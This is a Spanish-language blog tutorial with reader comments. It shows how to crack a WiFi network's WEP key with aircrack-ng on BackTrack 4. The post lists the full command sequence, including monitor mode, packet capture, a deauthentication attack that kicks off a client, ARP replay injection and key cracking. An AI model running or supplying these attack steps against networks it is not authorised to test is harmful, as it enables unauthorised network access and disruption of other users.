Seguridad y Redes

Tips, Video Tutoriales, Wifislax, VMware, Linux, GNS3, Eve-NG, CCNA, Cisco Routers, Switches

Video Cracking WEP - Desasociando un cliente conectado al AP

By 13:17 , , , , , , , , ,

En este vide se muestra el ataque 0 - Deautenticación para desasociar un cliente conectado al punto de acceso y asi obtener la clave WEP (Wired Equivalent Privacy) de la red inalambrica. El objetivo principal de los paquetes de deautenticación es interrumpir-romper la asociacion entre el cliente conectadioy el AP (Access Point). El ataque 0 o de Deautenticación (--deauth) es también conocido como el ataque DoS (Denegacion de Servicio), pero no es el propósito del vídeo.

Ataque 0: Deautenticación
Ataque 3: Reinyección de una petición ARP (ARP-request)
Estos pasos también se puede revisar en el post anterior.

Herramientas
* Backtrack 4 R2
http://www.backtrack-linux.org/downloads/
* Aircrack-ng (incluida en BackTrack)
http://www.aircrack-ng.org/
* Tarjeta WiFi que soporte el modo Monitor y la Inyección de paquetes

Comandos
root@bt:~# airmon-ng start wlan0

root@bt:~# airodump-ng mon0

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0

root@bt:~# aircrack-ng captura-01.cap
Vídeo Online
http://youtu.be/jUeBo2qBNJg?hd=1

, , , , , , , , ,

About the Author

Hablaremos sobre redes, seguridad, Cisco IOS, Linux y emulacion de dispositivos en GNS3.

You Might Also Like

4 comentarios

  1. sparko13 de abril de 2011, 21:56

    hola .. mira komo te komentaba ..tengo un usb wifi wifly city de 2w rtl8187 ahora el problema es q inicio la makina virtual kon el backtrack 4 r2 .. y al kerer ponerla en modo monitor me sale ese error q publikaste aki tambien ..ahora hago el procedimiento para q se arregle ..pero depues me keda en monitor pero no en "mon0" sino en "wlan0" tu crees q eso sea el proble q no puedo inyectar paketes a routers ...salu2

    ResponderEliminar
  2. delfirosales14 de abril de 2011, 0:12

    Buenas sparko.

    Lo que te puedo decir es que ese no es el problema, ya que yo mismo he realizado ataques chopchop y de fragmentacion con el mismo chipset que tiene tu dispositivo USB.

    Tengo tres dispositivos con el mismo chipset, el famoso rtl8187 y realizo auditorias utilizándolo como "Wlan0" tal como me lo detecta el airmon-ng.

    Talvez en algunos días, cuando tenga tiempo realizo un vídeo utilizando el chipset rtl8187 similar al tuyo y usándolo como wlan0.

    Lo de tu problema si no se autentica correctamente puede ser por la distancia, o igual los nuevos router algunos que no se dejan. En algunos casos puedes utilizar este ataque que se muestra en el vídeo, si vez algún cliente conectado realiza estos pasos y seguro que obtienes la key.

    Haber si en el mismo vídeo muestro también como se realiza un ataque a un AP con ESSID del tipo "delfi rosales" con espacios.

    Igual lo que puedo comentarte de mi experiencia utilizando el chipset rtl8187 es que en la parte cuando quieres asociarte al AP por lo regular en algunos falla la asociación, aveces logra asociarse cambiando a una dirección MAC y en algunos casos no es necesario. Pero a lo que voy es que hasta ahorita me ha impresionado un dispositivo USB, el ALFA 2000mW sin duda es el mejor dispositivo que tengo, es mi mejor adquisición, aunque me costo 500 pesos mexicanos y los demás dispositivos me costaron en 200 pesos pero bien el alfa 2000mw lo vale, cada peso lo vale. Es el único dispositivo con el cual he ataco diferentes APs y a la primera todas asocia sin duda alguna, hasta ahorita no me he topado con que no se a podido asociar al AP, siempre se asocia correctamente sin cambiar la dirección MAC. Así que si quieres en verdad un buen dispositivo sin duda te recomiendo el Alfa 2000mw, solo puedo decirte que es un dispositivo impresionante en cuanto ataques y no solo eso, también es muy bueno para entornos con mucho ruido, donde existen muchos APs sin duda conecta y navegas tranquilamente, en cambio los demás dispositivos que tengo en algunas ocasiones fallan, algunos solo muestran que tienen suficientes rallitas pero a la hora de conectar nomas no conectan.

    Bueno espero haberte aclarado algo.

    Saludos sparko.

    ResponderEliminar
  3. delfirosales14 de abril de 2011, 0:20

    Incluso puedes ver en este vídeo el alfa 2000mw en acción. Sin duda para mi es el mejor :P

    ResponderEliminar
  4. carliux9 de junio de 2011, 19:28

    hola sparko
    lo que pasa que en la caja de la antena viene un cd o dvd que tienes que arrancarlo con la compu y te va salir el backtrack 3 y tambien viene un manual que todo esta en chino pero viene unas palabras en ingles y tienes que seguir los pasos y viene tambien te explica en dibujo y sigues los pasos para tu informacion unas de las mejores antenas es esa wifly city no estan trabajoza como la alfa.
    yo compre varias antenas alfa y estoy teniendo el problema para deslaquearlas por eso entre a este titurial para poder deslaquearlas pero es mucho el problema y hazta orita no lo he solucionado despues de 2 meses te dejo mi correo carliux77@hotmail.com

    ResponderEliminar